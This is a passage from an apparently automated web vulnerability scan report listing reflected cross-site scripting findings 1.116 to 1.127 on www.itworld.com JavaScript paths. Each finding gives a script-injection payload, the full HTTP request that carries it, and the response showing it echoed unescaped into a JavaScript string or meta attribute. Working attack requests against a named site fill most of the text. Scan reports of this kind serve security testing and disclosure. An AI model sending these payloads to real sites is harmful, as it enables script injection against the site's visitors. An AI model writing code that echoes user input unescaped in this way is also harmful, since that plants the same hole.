Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...

s.prop13="CMS";
s.prop14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/misc8840a"-alert(1)-"5fcf5a7dc49/textarea.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you requested.";
s.eV
...[SNIP]...

1.116. http://www.itworld.com/sites/all/modules/contrib/InsertNode/back_from_comment.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/InsertNode/back_from_comment.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c598"-alert(1)-"3926cf3f7e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites8c598"-alert(1)-"3926cf3f7e1/all/modules/contrib/InsertNode/back_from_comment.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:20:11 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460011"
Content-Type: text/html; charset=utf-8
Content-Length: 57536
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:20:19 GMT
X-Varnish: 1959722744
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
s.prop13="CMS";
s.prop14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites8c598"-alert(1)-"3926cf3f7e1/all/modules/contrib/InsertNode/back_from_comment.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We coul
...[SNIP]...

1.117. http://www.itworld.com/sites/all/modules/contrib/InsertNode/back_from_comment.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/InsertNode/back_from_comment.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a26c2"><script>alert(1)</script>820884521c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitesa26c2"><script>alert(1)</script>820884521c8/all/modules/contrib/InsertNode/back_from_comment.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:19:56 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316459996"
Content-Type: text/html; charset=utf-8
Content-Length: 57756
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:19:59 GMT
X-Varnish: 1959722383
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sitesa26c2"><script>alert(1)</script>820884521c8/all/modules/contrib/InsertNode/back_from_comment.js?h"/>
...[SNIP]...

1.118. http://www.itworld.com/sites/all/modules/contrib/InsertNode/back_from_comment.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/InsertNode/back_from_comment.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a066"><script>alert(1)</script>6a8db849017 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all6a066"><script>alert(1)</script>6a8db849017/modules/contrib/InsertNode/back_from_comment.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:20:47 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460047"
Content-Type: text/html; charset=utf-8
Content-Length: 57756
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:20:52 GMT
X-Varnish: 1959723896
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all6a066"><script>alert(1)</script>6a8db849017/modules/contrib/InsertNode/back_from_comment.js?h"/>
...[SNIP]...

1.119. http://www.itworld.com/sites/all/modules/contrib/InsertNode/back_from_comment.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/InsertNode/back_from_comment.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b285"-alert(1)-"0e83f4850e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all5b285"-alert(1)-"0e83f4850e1/modules/contrib/InsertNode/back_from_comment.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:21:21 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460081"
Content-Type: text/html; charset=utf-8
Content-Length: 57536
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:21:23 GMT
X-Varnish: 1959725087
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
op13="CMS";
s.prop14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all5b285"-alert(1)-"0e83f4850e1/modules/contrib/InsertNode/back_from_comment.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't
...[SNIP]...

1.120. http://www.itworld.com/sites/all/modules/contrib/InsertNode/back_from_comment.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/InsertNode/back_from_comment.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3dfc"-alert(1)-"f63c8822a12 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contrib/InsertNodee3dfc"-alert(1)-"f63c8822a12/back_from_comment.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:23:05 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460185"
Content-Type: text/html; charset=utf-8
Content-Length: 57541
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:23:08 GMT
X-Varnish: 252446890
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
ch";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules/contrib/InsertNodee3dfc"-alert(1)-"f63c8822a12/back_from_comment.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you requeste
...[SNIP]...

1.121. http://www.itworld.com/sites/all/modules/contrib/InsertNode/back_from_comment.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/InsertNode/back_from_comment.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d8ce"><script>alert(1)</script>2182724e842 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/contrib/InsertNode5d8ce"><script>alert(1)</script>2182724e842/back_from_comment.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:22:26 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460146"
Content-Type: text/html; charset=utf-8
Content-Length: 57755
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:22:48 GMT
X-Varnish: 252446282
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all/modules/contrib/InsertNode5d8ce"><script>alert(1)</script>2182724e842/back_from_comment.js?h"/>
...[SNIP]...

1.122. http://www.itworld.com/sites/all/modules/contrib/ajax_poll/ajax_poll.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/ajax_poll/ajax_poll.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 808c6"-alert(1)-"df287d62db8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites808c6"-alert(1)-"df287d62db8/all/modules/contrib/ajax_poll/ajax_poll.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:20:40 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460040"
Content-Type: text/html; charset=utf-8
Content-Length: 57445
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:20:46 GMT
X-Varnish: 1959723685
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
s.prop13="CMS";
s.prop14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites808c6"-alert(1)-"df287d62db8/all/modules/contrib/ajax_poll/ajax_poll.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find
...[SNIP]...

1.123. http://www.itworld.com/sites/all/modules/contrib/ajax_poll/ajax_poll.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/ajax_poll/ajax_poll.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d4f4"><script>alert(1)</script>9c2c538f6a8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites9d4f4"><script>alert(1)</script>9c2c538f6a8/all/modules/contrib/ajax_poll/ajax_poll.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:20:16 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460016"
Content-Type: text/html; charset=utf-8
Content-Length: 57665
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:20:25 GMT
X-Varnish: 1959722824
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites9d4f4"><script>alert(1)</script>9c2c538f6a8/all/modules/contrib/ajax_poll/ajax_poll.js?h"/>
...[SNIP]...

1.124. http://www.itworld.com/sites/all/modules/contrib/ajax_poll/ajax_poll.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/ajax_poll/ajax_poll.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 773bb"-alert(1)-"e186b3ba359 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contrib773bb"-alert(1)-"e186b3ba359/ajax_poll/ajax_poll.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:22:41 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460161"
Content-Type: text/html; charset=utf-8
Content-Length: 57446
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:22:46 GMT
X-Varnish: 252446502
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
op14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules/contrib773bb"-alert(1)-"e186b3ba359/ajax_poll/ajax_poll.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you reques
...[SNIP]...

1.125. http://www.itworld.com/sites/all/modules/contrib/ajax_poll/ajax_poll.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/ajax_poll/ajax_poll.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fb6d"><script>alert(1)</script>994429c83f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/contrib5fb6d"><script>alert(1)</script>994429c83f/ajax_poll/ajax_poll.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:22:27 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460147"
Content-Type: text/html; charset=utf-8
Content-Length: 57655
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:22:30 GMT
X-Varnish: 252446301
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all/modules/contrib5fb6d"><script>alert(1)</script>994429c83f/ajax_poll/ajax_poll.js?h"/>
...[SNIP]...

1.126. http://www.itworld.com/sites/all/modules/contrib/ajax_poll/ajax_poll.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/ajax_poll/ajax_poll.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 497ae"-alert(1)-"878d9affe8e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contrib/ajax_poll/ajax_poll.js497ae"-alert(1)-"878d9affe8e?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:25:11 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460311"
Content-Type: text/html; charset=utf-8
Content-Length: 57452
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:25:18 GMT
X-Varnish: 1038159896
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
5="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules/contrib/ajax_poll/ajax_poll.js497ae"-alert(1)-"878d9affe8e";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you requested.";
s.eVar13="CMS";

...[SNIP]...

1.127. http://www.itworld.com/sites/all/modules/contrib/ajax_poll_results/ajax_poll_results.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/ajax_poll_results/ajax_poll_results.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc553"-alert(1)-"8bfb3a7cb5d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitesdc553"-alert(1)-"8bfb3a7cb5d/all/modules/contrib/ajax_poll_results/ajax_poll_results.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
